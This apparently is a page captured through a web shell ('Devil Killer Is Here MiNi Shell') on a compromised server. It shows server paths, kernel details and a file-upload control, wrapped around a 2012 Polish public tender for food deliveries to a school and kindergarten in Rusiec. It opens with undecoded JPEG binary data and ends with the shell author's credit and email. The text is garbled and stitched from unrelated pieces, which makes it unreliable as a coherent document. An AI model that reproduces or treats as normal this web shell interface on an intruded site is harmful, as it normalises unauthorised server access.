JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120802/282928-N-2012.html

<p class="kh_header"><b>Rusiec: Dostawa produktów żywnościowych do stołówki szkolnej i przedszkolnej Zespołu Szkolno-Przedszkolnego w Ruścu w roku szkolnym 2012,2013</b><br>
<b>Numer ogłoszenia: 282928 - 2012; data zamieszczenia: 02.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkolno-Przedszkolny w Ruścu , ul. Wieluńska 33, 97-438 Rusiec, woj. łódzkie, tel. 043 6766021, faks 043 6766021.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsprusiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych do stołówki szkolnej i przedszkolnej Zespołu Szkolno-Przedszkolnego w Ruścu w roku szkolnym 2012,2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych z przeznaczeniem na potrzeby żywnościowe dla stołówki szkolnej i przedszkolnej Zespołu Szkolno-Przedszkolnego w Ruścu w roku szkolnym 2012,2013.Dostawy obejmują następujący asortyment w zadaniach:zadanie 1- Owoce, warzywa i podobne produkty.Zadanie 2. Produkty mleczarskie.Zadanie 3.Oleje i tłuszcze zwierzęce lub roślinne.Zadanie 4.Produkty przemiału ziarna, skrobi i  produktów   skrobiowych.Zadanie 5.Ryby przetworzone i konserwowane.Zadanie 6.Produkty zwierzęce, mięso i produkty mięsne.Zadanie 7.Napoje.Zadanie 8.Pieczywo, świeże wyroby piekarskie i ciastkarskie.Zadanie 9.Różne produkty spożywcze.W skład niniejszego podmiotu zamówienia wchodzą następujące wyroby:
1.Ananas-Konshurt Marek Kasprzyk- lub równoważny-	puszka-565 g-60szt.2.Arbuz-30kg.3.Banany-220kg.4.Bazylia -Kucharz polski- lub równoważna	20g-25szt-5.Brzoskwinie - Konshurt Marek Kasprzyk- lub równoważne-puszka-850 - 80szt.6.Buraki czerwone świeże-270kg.7. 	Cebula-110kg.8.Chrzan tarty-Moryń- lub równoważny-słoik-170 g-45szt.9.Cytryna-81kg.10.Czosnek-główka-10szt-11.	Czosnek granulowany-Kucharz polski- lub równoważny-20 g-15szt.12.Dżem Łowicz lub równoważny-słoik-300 g-280szt.13.Dżem-Sorella-lub równoważny-słoik-270 g-	130szt.14.	Fasola-Jaś- Jermapol lub równoważna-paczka-400 g-145szt.15.Fasola czerwona Jarmar lub równoważna-puszka-380 g	-60szt-16.	Fasola drobna -Jermapol- lub równoważna-paczka	-400g	-30szt.17.	Fasola szparagowa-Jarmar- lub równoważna-słoik	400 g-400szt.18.	Fasola szparagowa mrożona-Agram- lub równoważna-paczka 450 g-60szt.19.Frytki  MC CAIN EXPRESS CRINCLE lub równoważne-paczka-2,5 kg-110szt.20.Groch łupany-Jermapol- lub równoważny-	paczka-400 g-30szt.21.	Groszek konserwowy-Jarmar- lub równoważny-puszka-	400 g	-100szt.22.	Jabłka słodkie -Lobo- lub równoważne-1.300kg.23.Kalafior mrożony- AGRAM- lub równoważny-	paczka-450 g-90szt.24.	Kapusta-młoda-główka-150szt.25.Kapusta biała-630kg.26.Kapusta czerwona-160kg.27.Kapusta kwaszona folia KOW. lub równoważna-290kg.28.Kapusta pekińska-260kg.29.	Ketchup -Tortex- łagodny lub równoważny-słoik	500 g	-90szt.30.	Koncentrat pomidor.-Wojna- lub równoważny -słoik-200 g-550szt.31.Koncentrat z buraka Kucharz polski lub równoważny -300 ml-30szt.32.Koper suszony Prymat  lub równoważny-25g-40szt
33.Koper świeży-pęczek-160szt.34.	Kukurydza Jarmar  lub równoważna-	puszka-	400g-	120szt.35.	Majeranek Kucharz polski  lub równoważny-8 g-	70szt.36.	Mandarynka	-420kg.37.	Marchew kostka mrożona-paczka 450 g-30szt.38.Marchew świeża-820kg.39.	Marmolada Piomar  lub równoważna	wiaderko-20kg.40. Mieszanka warzywna mrożona Agram  lub równoważna-paczka-450 g-30szt.41. Ogórek konserwowy Moryń  lub równoważny-słoik-0,9l-360szt.42.Ogórek kwaszony Moryń lub
równoważny-870 g-240szt.43.Ogórek świeży-280kg.44.Oregano Kucharz polski lub równoważne -100 g-120szt. 45. Papryka czerwona, żółta, zielona - świeża-50kg. 
46.Papryka konserwowa -Moryń- lub równoważna-słoik-870g-50szt.47.Pieczarki-180kg.48.Pieprz mielony czarny Kucharz polski -20 g-	170szt.49.Pietruszka korzeń-200kg. 50.	Pietruszka natka	pęczek-220szt.51.Pietruszka suszona Prymat lub równoważny-6 g-	115szt.52.	Pomarańcze	-395kg.53.	Pomidor-100kg.54.Por-190kg. 55.Rodzynki Kucharz lub równoważny -paczka-100 g-60szt.56.Rzodkiewka-pęczek-	60szt.57.Sałata zielona-główka-230szt.58.Sałatka warzywna szwedzka lub równoważna -słoik-380g-20szt.59.Seler-195kg.60.Śliwki węgierki-90kg.61.Truskawki	-60kg. 62.Tymianek Kucharz polski lub równoważny-10g-20szt.63.	Winogron-10kg.
64.Ziemniaki-7.100kg.65.Jogurt Jogobella lub równoważny-150 g-	1.315szt.66.Jogurt Jogobell lub równoważny-500g-110szt.67.Masło ekstra śmietankowe z Wielunia lub równoważne-200 g-1.000-szt.68.Maślanka Szczerców lub równoważna-1 litr-	200 litrów.69.Mleko 2 % -1 litr-3.220litrów. 70.Ser  Edamski lub równoważny	-70kg.71.	Ser Salami lub równoważny-100kg.72.Ser topiony Lactima Alpejska lub równoważny- 70kg. 73.Serki homogenizowane  waniliowe Szczerców lub równoważne-150 g	-80szt. 74.Śmietan fix- 9 g-60szt. 75.Śmietana  18 % Szczerców lub równoważna-400 g-	320szt. 76.	Śmietana  30 %  Szczerców  lub równoważna-200 g-350szt.77.Śmietana 12% Szczerców lub równoważna-200 g-710szt.78.Śmietana 30 % Szczerców lub równoważna-400 g-60szt.79.Twaróg półtłusty Szczerców lub równoważny -270kg.80.Majonez Winiary-400g- lub równoważny-125szt.81.Margaryna Panta 200g lub równoważny-70szt.82.Margaryna roślinna Bielmar 500g  lub równoważna-200szt.83.Margaryna zwykła z Kruszwicy250g lub równoważana-40szt.84.Olej Kujawski lub równoważny-370litrów.85.Smalec-100kg.86.Kasza Jermapol lub równoważna-160kg.87.	Kasza manna Jermapol lub równoważna-12kg.88.Mąka Szadkowska lub równoważna-	570kg.89.Mąka ziemniaczana SUPERIOL lub równoważna-55kg.90.Ryż Jermapol lub równoważny-130kg.91.Filety rybne do smażenia - Miruna lub równoważne-400kg.92.Paluszki rybne panierowane Mikłasz lub równoważne-60kg.93Ryby w puszce Łosoś lub równoważne-175 g-120szt.94.	Śledź  MatiasMORFISH lub równoważny -wiaderko-4 kg	-10wiaderek.95.Boczek wędzony parzony-55kg.96.Filet z kurczaka-380kg.97.Karczek b/k-260kg.98.Kiełbasa podwawelska-18kg.99.Kiełbasa szynkowa wieprzowa-na kanapki-80kg.100.Kiełbasa wiejska-255kg.101.Kości od schabu-500kg.102.	Kurczak świeży-100kg.103.Łopatka b/k-90kg.104.Mięso gulaszowe-380kg.105.Mięso mielone-450kg.106.Ogonówka-na kanapki-80kg.107.Parówka cienka wyborowa-60kg.108.Polędwica drobiowa-na kanapki-80kg.109.Porcja rosołowa-50kg.110.Schab bk-490kg.111.Skrzydełka z kurczaka-50kg.112.Słonina-30kg.113.Szynka surowa-55kg.114.Szynka wiejska-na kanapki-30kg.115..Udko z kurczaka-550kg.116.Wątroba wieprzowa-60kg.117.Wątróbka drobiowa-60kg.118.Wołowina bk-80kg.119.Herbata Minutka expresowa  lub równoważna-paczka	-40 T	280szt.120.Sok Kubuś  lub równoważny-.	0,33 l-500szt.121.Sok Caprio - czarna porzeczka lub równoważny-2 l-680szt.122.	Sok owocowy Hortex lub równoważny-0,2 l-770szt.123.Syrop czarna porzeczka Herbapol lub równoważny-420 g-50szt.124.Bułka duża100g-	520szt.125.Bułka mała 50g-6.800szt.126.Bułki słodkie-100szt.127.Chałka-40szt.128.Chleb600g-1.550szt. 129.Pączki-	100szt. 130.Ciasto drożdżowe-40szt.131.Pączki	-40kg.132.Rogale-200szt. 133.Baron - Jajka świąteczne lub równoważne Mikołaje-14kg.134.Barszcz biały Winiary lub równoważny-66 g-80szt.135.Baton 7 DEYS lub równoważny-30 g-	350szt.136. Baton Alpen Gold lub równoważny-45 g-350szt.137.Baton Chocapic lub równoważny-350szt.138.Baton Ferrero kinderchokolatelub równoważny-	50 g-100szt.139.Baton ww lub równoważny-45 g-240szt.140.Baton Kinder Buenolub równoważny- 43 g-350szt.141.Budyń z cukrem Winiary lub równoważny-77g-460szt.142.Bułka tarta Jermapol lub równoważna	-500 g-410szt.143. Cukier -    770kg.144.Cukier puder Japart lub równoważny	-400 g-50szt.145.Cukier waniliowy Delecta lub równoważny-32 g	-270szt.146.Cukierki Fruti -Tuti lub równoważne-	4kg.147.Cynamon Prymat lub równoważny -20 g-15szt.148.Czekolada Goplana mleczna lub równoważna-100g-200szt.149.Deser Montelub równoważny- 55 g-300szt.150.Drożdże -100 g	-100szt.151.Fix do mielonego Knnorl ub równoważny-	65 g-15szt.152.Galaretka Winiary lub równoważna-75 g-125szt.153.Grześki w czekoladzie Kalisz lub równoważne-39 g-1.500szt.154.Jaja-10.000szt.155.Kakao Deco Morreno lub równoważny-100 g-45szt.156.Kakao Puchatek granul.lub równoważny-300g-60szt.157.Kawa Inka rozp. Biogran lub równoważna-150 g-	90szt.158.Kisiel z cukrem Winiary lub równoważny -77g-470szt.159.Kluski śląskie Mikłasz  lub równoważne-450 g-300szt.160.Kostki rosołowe Winiary lub równoważne  -60 g	-250szt.161.Kwasek cytrynowy Winiary lub równoważne-50 g-70szt.162.Lider Biszkopty Jaśki lub równoważne-op-	1,3 kg-13sztuk.163.Lider ZOO zdobione lub równoważne-op.-	1,4 kg-13szt.164.	Liść laurowy Kucharz polski lub równoważny-6 g	40szt.165.Lizaki Frutis Mieszko lub równoważne	-8 g-	100szt.166.	Lody Koral kubek cztero-smakowy lub równoważne-200 ml-	100szt.167.Majeranek Prymat lub równoważny-8 g-	115szt.168.	Makaron Międzybrodzki lub równoważny -.	250 g	-360szt.169.Makaron świderekLubella lub równoważny-500 g-85szt.170.	Makaron świderekBabuni lub równoważny-500 g-600szt.171.Makaron zacierka Babuni lub równoważny-250 g-85szt.172.Musztarda Rolewski sarepska lub równoważny-	180 g	-20szt.173.Nutella Ferrero lub równoważna-230 g-60szt.174.Pasztet drobiowy DROP
lub równoważny-	160 g-250szt.175.Płatki kukurydziane  Pacyfik Corn fleksy Nesttle lub rónoważne-250 g-140szt.176.Przyprawa Delikat lub równoważna-200 g-10szt. 177.Przyprawa Kucharek lub równoważna-200 g	-130szt.178.Przyprawa Kucharek lub równoważna-75 g-240szt.179.Przyprawa do bigosu Kucharz polski lub równoważna-	20 g-40szt.180.Przyprawa do drobiu Kucharz polski lub równoważna-20 g-120szt. 181.Przyprawa do kurczaka Prymat lub równoważna-20 g-35szt.182.Przyprawa do mielonego Prymat lub równoważna-	20 g-	50szt.183.	Przyprawa Kebab Prymat lub równoważna-30 g-100szt.184.Przyprawa w płynie Winiary lub równoważna-210g-	300szt.185.Pyzy z mięsem Mikłasz ub równoważne-450 g-320szt.186.Sos do makaronu Jarmar lub równoważny -	sł.520 g-120szt.187.Sól Kujawska lub równoważny-160szt.188.Uszka z grzybami Mikłasz lub równoważne-paczka-300 g-	100szt.189.Ziarenko smaku Winiary lub równoważne-120 g-150szt.190.Ziele angielskie Kucharz polski lub równoważne	-15 g-22szt.191.Zupa borowikowa w proszku Winiary lub równoważna-65 g-30szt.192.Pyzy drożdżowe	op.-400 g-200szt.
				

Uwaga!
Zamawiający dokonując opisu poszczególnych produktów wskazał nazwę handlową- nazwę producenta, typ produktu, tym samym wskazał minimalny dopuszczalny standard jakościowy produktów. W tym zakresie Zamawiający dopuszcza możliwość składania ofert równoważnych tj. obejmujących towary innych producentów, o innej nazwie handlowej, które posiadają nie gorsze cechy jakościowe, wydajnościowe, użytkowe od produktów wskazanych przez Zamawiającego oraz o tej samej wielkości produktu, wielkości opakowania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.50.00.00-3, 15.40.00.00-2, 15.60.00.00-4, 15.20.00.00-0, 15.10.00.00-9, 15.90.00.00-7, 15.81.00.00-9, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia, złożonego przez Wykonawcę zgodnie z treścią załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualne postanowienie o dopuszczeniu do użytkowania pojazdu ze wskazaniem do przewozu jakich produktów jest przeznaczony.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsprusiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkolno-Przedszkolny w Ruścu, ul. Wieluńska 33, 97-438 Rusiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 08:30, miejsce: Zespół Szkolno-Przedszkolny w Ruścu, ul. Wieluńska 33, 97-438 Rusiec w sekretariacie zespołu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com